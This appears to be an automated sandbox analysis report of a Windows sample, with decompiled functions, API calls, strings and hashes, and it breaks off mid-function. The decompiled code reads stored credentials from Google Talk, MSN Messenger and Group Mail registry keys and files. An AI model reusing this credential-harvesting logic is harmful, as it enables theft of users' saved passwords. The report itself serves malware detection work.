Uniqueness

Uniqueness Score: -1.00%

Function 004037B1, Relevance: 12.1, APIs: 7, Strings: 1, Instructions: 86
stringCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E004037B1(void* __ecx, void* __edi, void* __fp0, intOrPtr _a4) {
				char _v276;
				char _v404;
				intOrPtr _v408;
				char _v792;
				intOrPtr _v796;
				char _v924;
				char _v936;
				void _v1959;
				char _v1960;
				void _v2983;
				char _v2984;
				void* __ebx;
				void* __esi;
				void* _t28;
				void* _t50;
				void* _t51;
				char* _t59;
				char* _t63;
				void* _t70;

				_t70 = __fp0;
				_t51 = __ecx;
				_v1960 = 0;
				memset( &_v1959, 0, 0x3ff);
				_v2984 = 0;
				memset( &_v2983, 0, 0x3ff);
				_t28 = E00410F79(_t51,  &_v2984,  &_v1960); // executed
				if(_t28 == 0) {
					return _t28;
				}
				E004021D8( &_v936);
				_push( &_v1960);
				_t50 = 0x7f;
				E004060D0(_t50,  &_v276);
				_t59 =  &_v404;
				E004060D0(_t50, _t59,  &_v2984);
				_v796 = 9;
				_v408 = 3;
				_t63 = strchr(_t59, 0x40);
				_push( &_v404);
				if(_t63 == 0) {
					if(strlen() + 0xa < 0) {
						sprintf( &_v792, "%s@yahoo.com",  &_v404);
					}
				} else {
					strcpy( &_v792, ??);
					 *_t63 = 0;
				}
				strcpy( &_v924,  &_v404);
				return E00402407( &_v936, _t70, _a4);
			}

0x004037b1
0x004037b1
0x004037cc
0x004037d2
0x004037e0
0x004037e6
0x004037fc
0x00403803
0x004038cc
0x004038cc
0x00403810
0x0040381b
0x0040381e
0x00403825
0x00403831
0x00403837
0x00403841
0x0040384b
0x0040385d
0x00403868
0x00403869
0x00403889
0x0040389e
0x004038a3
0x0040386b
0x00403872
0x00403879
0x00403879
0x004038b4
0x00000000

APIs

memset.MSVCRT ref: 004037D2
memset.MSVCRT ref: 004037E6

Part of subcall function 00410F79: memset.MSVCRT ref: 00410F9B
Part of subcall function 00410F79: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 00411007

Part of subcall function 004060D0: strlen.MSVCRT ref: 004060D5
Part of subcall function 004060D0: memcpy.MSVCRT ref: 004060EA

strchr.MSVCRT ref: 00403855
strcpy.MSVCRT(?,?,?,?,?), ref: 00403872
strlen.MSVCRT ref: 0040387E
sprintf.MSVCRT ref: 0040389E
strcpy.MSVCRT(?,?,?,?,?), ref: 004038B4

Strings

%s@yahoo.com, xrefs: 00403898

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: memset$strcpystrlen$Closememcpysprintfstrchr
String ID: %s@yahoo.com
API String ID: 1649821605-3288273942
Opcode ID: d756cc4bb234ca8bd2adb7c792dfa1259f1477984d05252a8ea6bc4bb60e6678
Instruction ID: 59c64947ec9ad5e5fa7ad27033647646f0aae9e06f6053b7dc62ef58ab254070
Opcode Fuzzy Hash: d756cc4bb234ca8bd2adb7c792dfa1259f1477984d05252a8ea6bc4bb60e6678
Instruction Fuzzy Hash: 592184B3D0412C6EDB21EB55DD41FDA77AC9F85308F0404EBB64DE6041E6B8AB848BA5

Uniqueness

Uniqueness Score: -1.00%

Function 004034CB, Relevance: 10.5, APIs: 4, Strings: 3, Instructions: 47
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004034CB(void* __ecx, void* __eflags, void* __fp0, intOrPtr _a4) {
				void _v267;
				char _v268;
				void _v531;
				char _v532;
				void* __edi;
				void* __esi;
				void* _t15;
				void* _t23;
				char* _t28;

				_t23 = __ecx;
				_v532 = 0;
				memset( &_v531, 0, 0x104);
				_v268 = 0;
				memset( &_v267, 0, 0x104);
				_t15 = E0040EBC1(_t23, 0x80000002, "Software\\Group Mail", "InstallPath",  &_v532, 0xfa); // executed
				if(_t15 != 0) {
					strcpy( &_v268,  &_v532);
					_t28 =  &_v268;
					E00405F1F(_t28);
					strcat(_t28, "fb.dat");
					return E004033D7(_t28, __fp0, _a4);
				}
				return _t15;
			}

0x004034cb
0x004034e4
0x004034eb
0x004034fa
0x00403501
0x00403521
0x0040352b
0x0040353c
0x00403541
0x00403547
0x00403554
0x00000000
0x00403566
0x00403569

APIs

memset.MSVCRT ref: 004034EB
memset.MSVCRT ref: 00403501

Part of subcall function 0040EBC1: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 0040EBFA

strcpy.MSVCRT(00000000,00000000), ref: 0040353C

Part of subcall function 00405F1F: strlen.MSVCRT ref: 00405F20
Part of subcall function 00405F1F: strcat.MSVCRT(00000000,00413044,004062BF,00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 00405F37

strcat.MSVCRT(00000000,fb.dat,00000000,00000000), ref: 00403554

Strings

Software\Group Mail, xrefs: 00403517
InstallPath, xrefs: 00403512
fb.dat, xrefs: 0040354E

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: memsetstrcat$Closestrcpystrlen
String ID: InstallPath$Software\Group Mail$fb.dat
API String ID: 1387626053-966475738
Opcode ID: b4206de9c90982f9c66f6cfc9dc9c0c880768121677d473e1c5bd2e45b33c8fe
Instruction ID: 7ff2b4ee0b8a45595852750e2855a272ac8b2b1e575441dca18af6517dfb7442
Opcode Fuzzy Hash: b4206de9c90982f9c66f6cfc9dc9c0c880768121677d473e1c5bd2e45b33c8fe
Instruction Fuzzy Hash: 2E01FC72D8012C75D720E6669C46FDA766C8F64745F0004A6BA4AF20C2DAFCABD48B69

Uniqueness

Uniqueness Score: -1.00%

Function 0040754D, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79
registryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E0040754D(void* __ecx, void* __eflags, int _a4, char _a8, char _a12, void _a13, char _a268, void _a269) {
				void* _v0;
				char _v4;
				long _t29;
				void* _t33;
				void* _t36;
				signed int _t54;
				void* _t56;
				void* _t57;
				void* _t58;

				_t50 = __ecx;
				E004118A0(0x1110, __ecx);
				E0040724C(_a4); // executed
				_t29 = E0040EB3F(0x80000001, "Software\\Google\\Google Talk\\Accounts",  &_v4);
				_t56 = (_t54 & 0xfffffff8) + 0xc;
				if(_t29 == 0) {
					_a4 = 0;
					_a12 = 0;
					memset( &_a13, 0, 0xff);
					_t57 = _t56 + 0xc;
					_t33 = E0040EC05(_v0, 0,  &_a12);
					while(1) {
						_t58 = _t57 + 0xc;
						if(_t33 != 0) {
							break;
						}
						_t36 = E0040EB3F(_v0,  &_a12,  &_a8);
						_t57 = _t58 + 0xc;
						if(_t36 == 0) {
							_a268 = 0;
							memset( &_a269, 0, 0xfff);
							E0040EB80(0xfff, _t50, _a8, "pw",  &_a268);
							_t57 = _t57 + 0x18;
							E00407406( &_a268, _a4,  &_a12);
							RegCloseKey(_v0);
						}
						_a4 = _a4 + 1;
						_t33 = E0040EC05(_v0, _a4,  &_a12);
					}
					_t29 = RegCloseKey(_v0);
				}
				return _t29;
			}

0x0040754d
0x00407558
0x00407562
0x00407576
0x0040757b
0x00407580
0x00407593
0x00407597
0x0040759b
0x004075a0
0x004075ad
0x00407642
0x00407642
0x00407647
0x00000000
0x00000000
0x004075cb
0x004075d0
0x004075d5
0x004075e5
0x004075ec
0x0040760a
0x0040760f
0x00407621
0x0040762a
0x0040762a
0x0040762c
0x0040763d
0x0040763d
0x00407651
0x00407651
0x00407658

APIs

Part of subcall function 0040724C: memset.MSVCRT ref: 004072AE
Part of subcall function 0040724C: memset.MSVCRT ref: 004072C2
Part of subcall function 0040724C: memset.MSVCRT ref: 004072DC
Part of subcall function 0040724C: memset.MSVCRT ref: 004072F1
Part of subcall function 0040724C: GetComputerNameA.KERNEL32 ref: 00407313
Part of subcall function 0040724C: GetUserNameA.ADVAPI32(?,?), ref: 00407327
Part of subcall function 0040724C: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00407346
Part of subcall function 0040724C: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 0040735B
Part of subcall function 0040724C: strlen.MSVCRT ref: 00407364
Part of subcall function 0040724C: strlen.MSVCRT ref: 00407373
Part of subcall function 0040724C: memcpy.MSVCRT ref: 00407385

Part of subcall function 0040EB3F: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52

memset.MSVCRT ref: 0040759B

Part of subcall function 0040EC05: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 0040EC28

memset.MSVCRT ref: 004075EC
RegCloseKey.ADVAPI32(?,?,?), ref: 0040762A
RegCloseKey.ADVAPI32(?), ref: 00407651

Strings

Software\Google\Google Talk\Accounts, xrefs: 0040756C

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUsermemcpy
String ID: Software\Google\Google Talk\Accounts
API String ID: 2959138223-1079885057
Opcode ID: a9382395aa04bc6a2dd49f4cc28a46152cbaa1b62cfbf9a84d5181dec9838710
Instruction ID: 125b9810afc719f5725a34431a69a8fbc80fc1372edd2e7206a69bc0ee1a9f38
Opcode Fuzzy Hash: a9382395aa04bc6a2dd49f4cc28a46152cbaa1b62cfbf9a84d5181dec9838710
Instruction Fuzzy Hash: 6A21887150820A6FD610EF51DC42DEBB7ECDF94344F00083AF945E1191E635D96D9BA7

Uniqueness

Uniqueness Score: -1.00%

Function 0040A5AC, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E0040A5AC(void* __eax) {
				void* __esi;
				_Unknown_base(*)()* _t26;
				void* _t31;
				intOrPtr _t34;
				char* _t44;
				void* _t45;
				intOrPtr* _t46;
				int _t47;

				_t45 = __eax;
				_t37 =  *((intOrPtr*)(__eax + 0x37c));
				_t47 = 0;
				if( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x37c)) + 0x30)) > 0) {
					do {
						_t31 = E00406DEB(_t47, _t37);
						_push(_t31);
						_push("/sort");
						L004115C4();
						if(_t31 == 0) {
							_t4 = _t47 + 1; // 0x1
							_t44 = E00406DEB(_t4,  *((intOrPtr*)(_t45 + 0x37c)));
							_t54 =  *_t44 - 0x7e;
							_t34 =  *((intOrPtr*)(_t45 + 0x370));
							if( *_t44 != 0x7e) {
								_push(0);
							} else {
								_push(1);
								_t44 = _t44 + 1;
							}
							_push(_t44);
							E0040A119(_t34, _t54);
						}
						_t37 =  *((intOrPtr*)(_t45 + 0x37c));
						_t47 = _t47 + 1;
					} while (_t47 <  *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x37c)) + 0x30)));
				}
				E00405E2C();
				 *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x370)) + 0x28)) = 0;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x370)))) + 0x5c))();
				if(E00406DFB( *((intOrPtr*)(_t45 + 0x37c)), "/nosort") == 0xffffffff) {
					_t46 =  *((intOrPtr*)(_t45 + 0x370));
					if( *0x41748c == 0) {
						 *0x417490 =  *((intOrPtr*)(_t46 + 0x1ac));
						 *0x41748c = 1;
					}
					_t26 =  *((intOrPtr*)( *_t46 + 0x60))(E0040A0F3);
					qsort( *((intOrPtr*)( *_t46 + 0x64))(), 0,  *(_t46 + 0x28), _t26);
				}
				return SetCursor( *0x416b98);
			}

0x0040a5af
0x0040a5b1
0x0040a5b9
0x0040a5be
0x0040a5c0
0x0040a5c2
0x0040a5c7
0x0040a5c8
0x0040a5cd
0x0040a5d6
0x0040a5de
0x0040a5e6
0x0040a5e8
0x0040a5eb
0x0040a5f1
0x0040a5f8
0x0040a5f3
0x0040a5f3
0x0040a5f5
0x0040a5f5
0x0040a5f9
0x0040a5fa
0x0040a5fa
0x0040a5ff
0x0040a605
0x0040a606
0x0040a5c0
0x0040a60b
0x0040a616
0x0040a621
0x0040a637
0x0040a63f
0x0040a645
0x0040a64d
0x0040a652
0x0040a652
0x0040a668
0x0040a676
0x0040a67b
0x0040a68d

APIs

_mbsicmp.MSVCRT ref: 0040A5CD
qsort.MSVCRT ref: 0040A676
SetCursor.USER32(/nosort,?,0040BAC6), ref: 0040A684

Strings

/sort, xrefs: 0040A5C8
/nosort, xrefs: 0040A62A

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Cursor_mbsicmpqsort
String ID: /nosort$/sort
API String ID: 882979914-1578091866
Opcode ID: 37bac6c9d6653dd70bdeecbb298df2510de2a0ce3a9ae5c3ad425128252b2c66
Instruction ID: 1813cf3d9500be1981e9bba0c11058464626672cad6922460886ab76c06e8bc1
Opcode Fuzzy Hash: 37bac6c9d6653dd70bdeecbb298df2510de2a0ce3a9ae5c3ad425128252b2c66
Instruction Fuzzy Hash: 4921B071304601EFC719AF75C880A99B7A9BF08314B10017EF429A7291CB39A9628B8A

Uniqueness

Uniqueness Score: -1.00%

Function 0040EE59, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E0040EE59(char* __edi, void* __esi) {
				void* _v8;
				char _v40;
				void _v299;
				char _v300;
				void* _t32;
				char* _t37;
				void* _t38;

				_t38 = __esi;
				_t37 = __edi;
				E0040EDAC();
				if( *0x41751c == 0 ||  *((intOrPtr*)(E00406278() + 0x10)) == 1 && (__esi == 0x19 || __esi == 0x17 || __esi == 0x16)) {
					_v300 = 0;
					memset( &_v299, 0, 0x103);
					if(_t38 == 0x19 || _t38 == 0x17 || _t38 == 0x16) {
						_push( &_v8);
						_push("Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders");
						_push(0x80000002);
					} else {
						_push( &_v8);
						_push("Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders");
						_push(0x80000001);
					}
					if(E0040EB3F() == 0) {
						E0040EDDB(_t38);
						E0040EB80(0x104,  &_v40, _v8,  &_v40,  &_v300);
						RegCloseKey(_v8);
					}
					strcpy(_t37,  &_v300);
					return 0 |  *_t37 != 0x00000000;
				} else {
					_t32 =  *0x41751c(0, _t37, _t38, 0); // executed
					return _t32;
				}
			}

0x0040ee59
0x0040ee59
0x0040ee63
0x0040ee70
0x0040eea8
0x0040eeae
0x0040eeb9
0x0040eec8
0x0040eec9
0x0040eece
0x0040eed5
0x0040eed8
0x0040eed9
0x0040eede
0x0040eede
0x0040eeed
0x0040eef4
0x0040ef0c
0x0040ef17
0x0040ef17
0x0040ef25
0x00000000
0x0040ee8c
0x0040ee90
0x00000000
0x0040ee90

APIs

Part of subcall function 0040EDAC: LoadLibraryA.KERNEL32(shell32.dll,0040B9D8,74E04DE0,?,00000000), ref: 0040EDBA
Part of subcall function 0040EDAC: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 0040EDCF

memset.MSVCRT ref: 0040EEAE
RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 0040EF17
strcpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 0040EF25

Part of subcall function 00406278: GetVersionExA.KERNEL32(00417118,0000001A,0040EE77,00000104), ref: 00406292

Strings

Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 0040EEC9, 0040EED9

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: AddressCloseLibraryLoadProcVersionmemsetstrcpy
String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
API String ID: 181880968-2036018995
Opcode ID: f36eb23c2dc7077338fc74569912d0170d623695a7104f0b3b9fc9f5b09292aa
Instruction ID: b4f7ca4f0d473bdd6f3573a0ab4a655380742daec172f7a18688454dd959f7ad
Opcode Fuzzy Hash: f36eb23c2dc7077338fc74569912d0170d623695a7104f0b3b9fc9f5b09292aa
Instruction Fuzzy Hash: D711D871800219FADB24A656DC89DEF77BCDB04309F1008B7F91572191D63D9FA886DD

Uniqueness

Uniqueness Score: -1.00%

Function 0040396C, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040396C(void* __eflags, void* __fp0, intOrPtr _a4) {
				char _v528;
				intOrPtr _v540;
				char _v796;
				char _v1052;
				void* _v1056;
				void* _v1060;
				int _v1064;
				void* __ebx;
				void* __esi;
				void* _t21;
				long _t23;
				void** _t24;
				long _t26;
				int _t32;
				void* _t52;

				_t52 = __fp0;
				_v540 = 0x412e80;
				E004046D7( &_v528);
				_t32 = 0;
				_v1052 = 0;
				_v796 = 0;
				_v1064 = 0;
				do {
					if(_v1064 != _t32) {
						__eflags = _v1064 - 1;
						if(__eflags != 0) {
							_t21 = E0040D5DB( &_v1052, __eflags); // executed
						} else {
							_t23 = RegOpenKeyExA(0x80000001, "Software\\Microsoft\\MessengerService", _t32, 0x20019,  &_v1060); // executed
							__eflags = _t23;
							if(_t23 != 0) {
								goto L5;
							} else {
								_t24 =  &_v1060;
								goto L4;
							}
						}
					} else {
						_t26 = RegOpenKeyExA(0x80000001, "Software\\Microsoft\\MSNMessenger", _t32, 0x20019,  &_v1056); // executed
						if(_t26 != 0) {
							L5:
							_t21 = 0;
						} else {
							_t24 =  &_v1056;
							L4:
							_t21 = E0040D4A6( &_v1052, _t24);
						}
					}
					_t32 = 0;
					if(_t21 != 0) {
						E004038CF(_t52, _a4,  &_v1052);
					}
					_v1064 = _v1064 + 1;
				} while (_v1064 <= 2);
				return E004047F1( &_v528);
			}

0x0040396c
0x00403982
0x0040398d
0x00403998
0x0040399a
0x0040399e
0x004039a5
0x004039ae
0x004039b2
0x004039df
0x004039e4
0x00403a07
0x004039e6
0x004039f7
0x004039f9
0x004039fb
0x00000000
0x004039fd
0x004039fd
0x00000000
0x004039fd
0x004039fb
0x004039b4
0x004039c5
0x004039c9
0x004039db
0x004039db
0x004039cb
0x004039cb
0x004039cf
0x004039d4
0x004039d4
0x004039c9
0x00403a0c
0x00403a10
0x00403a1a
0x00403a1a
0x00403a1f
0x00403a23
0x00403a3c

APIs

Part of subcall function 004046D7: strcpy.MSVCRT ref: 00404726

RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\MSNMessenger,00000000,00020019,?), ref: 004039C5

Part of subcall function 0040D5DB: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,?,000000FF,00000000,00000000,?,?,00000001), ref: 0040D6A7
Part of subcall function 0040D5DB: strlen.MSVCRT ref: 0040D6B7
Part of subcall function 0040D5DB: strcpy.MSVCRT(?,?), ref: 0040D6C8
Part of subcall function 0040D5DB: LocalFree.KERNEL32(?), ref: 0040D6D5

RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\MessengerService,00000000,00020019,?), ref: 004039F7

Strings

Software\Microsoft\MSNMessenger, xrefs: 004039BF
Software\Microsoft\MessengerService, xrefs: 004039F1

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Openstrcpy$ByteCharFreeLocalMultiWidestrlen
String ID: Software\Microsoft\MSNMessenger$Software\Microsoft\MessengerService
API String ID: 1910562259-1741179510
Opcode ID: a042053f0881545de1053e7963e322542f87d6f2c27a3a690180a3307b8871c0
Instruction ID: e1373b66f94ab8684edf5be4eb08dc620599410c0cc400d8dd4f2e2a864aae35
Opcode Fuzzy Hash: a042053f0881545de1053e7963e322542f87d6f2c27a3a690180a3307b8871c0
Instruction Fuzzy Hash: 4F11F6B1608345AEC320DF5188819ABBBEC9B84355F50893FF584A2081D338DA09CAAB

Uniqueness

Uniqueness Score: -1.00%

Function 0040ED0B, Relevance: 6.1, APIs: 4, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040ED0B(unsigned int _a4, CHAR* _a8, CHAR* _a12) {
				struct HRSRC__* _t12;
				void* _t16;
				void* _t17;
				signed int _t26;
				signed int _t29;
				signed int _t33;
				struct HRSRC__* _t35;
				signed int _t36;

				_t12 = FindResourceA(_a4, _a12, _a8); // executed
				_t35 = _t12;
				if(_t35 != 0) {
					_t33 = SizeofResource(_a4, _t35);
					if(_t33 > 0) {
						_t16 = LoadResource(_a4, _t35);
						if(_t16 != 0) {
							_t17 = LockResource(_t16);
							if(_t17 != 0) {
								_a4 = _t33;
								_t29 = _t33 * _t33;
								_t36 = 0;
								_t7 =  &_a4;
								 *_t7 = _a4 >> 2;
								if( *_t7 != 0) {
									do {
										_t26 =  *(_t17 + _t36 * 4) * _t36 * _t33 * 0x00000011 ^  *(_t17 + _t36 * 4) + _t29;
										_t36 = _t36 + 1;
										_t29 = _t26;
									} while (_t36 < _a4);
								}
								 *0x417110 =  *0x417110 + _t29 ^ _t33;
							}
						}
					}
				}
				return 1;
			}

0x0040ed18
0x0040ed1e
0x0040ed22
0x0040ed2f
0x0040ed33
0x0040ed39
0x0040ed41
0x0040ed44
0x0040ed4c
0x0040ed50
0x0040ed53
0x0040ed56
0x0040ed58
0x0040ed58
0x0040ed5c
0x0040ed5f
0x0040ed6f
0x0040ed71
0x0040ed75
0x0040ed75
0x0040ed79
0x0040ed83
0x0040ed83
0x0040ed4c
0x0040ed41
0x0040ed88
0x0040ed8e

APIs

FindResourceA.KERNEL32(?,?,?), ref: 0040ED18
SizeofResource.KERNEL32(?,00000000), ref: 0040ED29
LoadResource.KERNEL32(?,00000000), ref: 0040ED39
LockResource.KERNEL32(00000000), ref: 0040ED44

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Resource$FindLoadLockSizeof
String ID:
API String ID: 3473537107-0
Opcode ID: 4124c9c16d571b3a6a6dda8a6002e2ff58418d98f6681f6753ff1314487d049b
Instruction ID: 6bf1e5af94a697a74b0619517749427008784a8e56cd275cc50dd62f01ccc87b
Opcode Fuzzy Hash: 4124c9c16d571b3a6a6dda8a6002e2ff58418d98f6681f6753ff1314487d049b
Instruction Fuzzy Hash: 450104367002126BCB185F66CD4599B7FAAFF852903488536AD09DA360D770C921C688

Uniqueness

Uniqueness Score: -1.00%

Function 0040EA72, Relevance: 6.1, APIs: 4, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E0040EA72(void* __ecx, intOrPtr* __edi, void* __eflags, intOrPtr _a4, CHAR* _a8, CHAR* _a12, intOrPtr _a16, CHAR* _a20) {
				void _v8199;
				char _v8200;
				void* __ebx;
				int _t23;
				CHAR* _t31;

				E004118A0(0x2004, __ecx);
				_v8200 = 0;
				if(_a4 == 0) {
					memset( &_v8199, 0, 0x2000);
					GetPrivateProfileStringA(_a8, _a12, 0x412466,  &_v8200, 0x2000, _a20); // executed
					_t23 = E004067DC( &_v8200, __edi, _a16);
				} else {
					memset( &_v8199, 0, 0x2000);
					_t31 =  &_v8200;
					E00406763(_t31, _a16,  *__edi);
					_t23 = WritePrivateProfileStringA(_a8, _a12, _t31, _a20);
				}
				return _t23;
			}

0x0040ea7a
0x0040ea85
0x0040ea8b
0x0040ead5
0x0040eaf3
0x0040eb03
0x0040ea8d
0x0040ea9a
0x0040eaa1
0x0040eaaa
0x0040eabe
0x0040eabe
0x0040eb0d

APIs

memset.MSVCRT ref: 0040EA9A

Part of subcall function 00406763: sprintf.MSVCRT ref: 0040679B
Part of subcall function 00406763: memcpy.MSVCRT ref: 004067AE

WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 0040EABE
memset.MSVCRT ref: 0040EAD5
GetPrivateProfileStringA.KERNEL32(?,?,Function_00012466,?,00002000,?), ref: 0040EAF3

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: PrivateProfileStringmemset$Writememcpysprintf
String ID:
API String ID: 3143880245-0
Opcode ID: 55a900beb3324ae435e234628281be75478a67a5b39370e1d0f1c50bd7ccf1f7
Instruction ID: dd976746f5256500085d4a95e5c89bc7782f2e7a6919953fe2ebae93c0a04965
Opcode Fuzzy Hash: 55a900beb3324ae435e234628281be75478a67a5b39370e1d0f1c50bd7ccf1f7
Instruction Fuzzy Hash: 6F01A172800219BFEF12AF51DC89DDB3B79EF04344F0044A6B609A2062D6359A64CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0040B785, Relevance: 6.1, APIs: 4, Instructions: 51
windowCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E0040B785(intOrPtr __eax, intOrPtr* __ebx) {
				void* __edi;
				void* __esi;
				intOrPtr _t14;
				intOrPtr _t15;
				void* _t16;
				void* _t17;
				struct HICON__* _t19;
				intOrPtr* _t23;
				void* _t25;

				_t23 = __ebx;
				_t14 = __eax;
				 *((intOrPtr*)(__ebx + 0x124)) = 0;
				 *__ebx = 0x41356c;
				 *((intOrPtr*)(__ebx + 0x258)) = 0;
				_push(0x14);
				 *((intOrPtr*)(__ebx + 0x374)) = 0;
				L004115D0();
				if(__eax == 0) {
					_t14 = 0;
					__eflags = 0;
				} else {
					 *0x417114 = __eax;
				}
				 *((intOrPtr*)(_t23 + 0x36c)) = _t14;
				L004115D0(); // executed
				_t32 = _t14;
				_t25 = 0xf38;
				if(_t14 == 0) {
					_t15 = 0;
					__eflags = 0;
				} else {
					_t15 = E00404016(_t14, _t32);
				}
				 *((intOrPtr*)(_t23 + 0x370)) = _t15;
				 *((intOrPtr*)(_t23 + 0x378)) = 0;
				 *((intOrPtr*)(_t23 + 0x260)) = 0;
				 *((intOrPtr*)(_t23 + 0x25c)) = 0;
				 *((intOrPtr*)(_t23 + 0x154)) = 0;
				_t16 =  *(_t23 + 0x258);
				if(_t16 != 0) {
					DeleteObject(_t16);
					 *(_t23 + 0x258) = 0;
				}
				_t17 = E00406252(); // executed
				 *(_t23 + 0x258) = _t17;
				E00401000(_t25, _t23 + 0x158, 0x413480);
				_t19 = LoadIconA( *0x416b94, 0x65); // executed
				E004017A4(_t23, _t19);
				return _t23;
			}

0x0040b785
0x0040b785
0x0040b789
0x0040b78f
0x0040b795
0x0040b79b
0x0040b79d
0x0040b7a3
0x0040b7ab
0x0040b7b4
0x0040b7b4
0x0040b7ad
0x0040b7ad
0x0040b7ad
0x0040b7bb
0x0040b7c1
0x0040b7c6
0x0040b7c8
0x0040b7c9
0x0040b7d4
0x0040b7d4
0x0040b7cb
0x0040b7cd
0x0040b7cd
0x0040b7d6
0x0040b7dc
0x0040b7e2
0x0040b7e8
0x0040b7ee
0x0040b7f4
0x0040b7fc
0x0040b7ff
0x0040b805
0x0040b805
0x0040b80b
0x0040b81b
0x0040b821
0x0040b82e
0x0040b837
0x0040b840

APIs

??2@YAPAXI@Z.MSVCRT ref: 0040B7A3
??2@YAPAXI@Z.MSVCRT ref: 0040B7C1
DeleteObject.GDI32(?), ref: 0040B7FF
LoadIconA.USER32 ref: 0040B82E

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ??2@$DeleteIconLoadObject
String ID:
API String ID: 1986663749-0
Opcode ID: 0423a71d4927b18fd553b5e50ae37bff09cbbc21581d25ca9f1141fabe86d1e7
Instruction ID: 38da8263615bef274e7c21802c355ecfe582676222a25676d72b73c1d19d8401
Opcode Fuzzy Hash: 0423a71d4927b18fd553b5e50ae37bff09cbbc21581d25ca9f1141fabe86d1e7
Instruction Fuzzy Hash: 8C1151B09056509BCF519F259C887C53BA4EB84B41F1804BBFD08EF3A6DBB845418BAC

Uniqueness

Uniqueness Score: -1.00%

Function 004060FA, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004060FA(signed int* __eax, void* __edx, void** __edi, signed int _a4, intOrPtr _a8) {
				void* _t8;
				void* _t13;
				signed int _t16;
				void** _t21;
				signed int _t22;

				_t21 = __edi;
				_t22 =  *__eax;
				if(__edx < _t22) {
					return 0;
				} else {
					_t13 =  *__edi;
					do {
						 *__eax =  *__eax + _a8;
						_t16 =  *__eax;
					} while (__edx >= _t16);
					_t8 = malloc(_t16 * _a4); // executed
					 *__edi = _t8;
					if(_t22 > 0) {
						if(_t8 != 0) {
							memcpy(_t8, _t13, _t22 * _a4);
						}
						free(_t13);
					}
					return 0 |  *_t21 != 0x00000000;
				}
			}

0x004060fa
0x004060fb
0x004060ff
0x0040614a
0x00406101
0x00406102
0x00406104
0x00406108
0x0040610a
0x0040610c
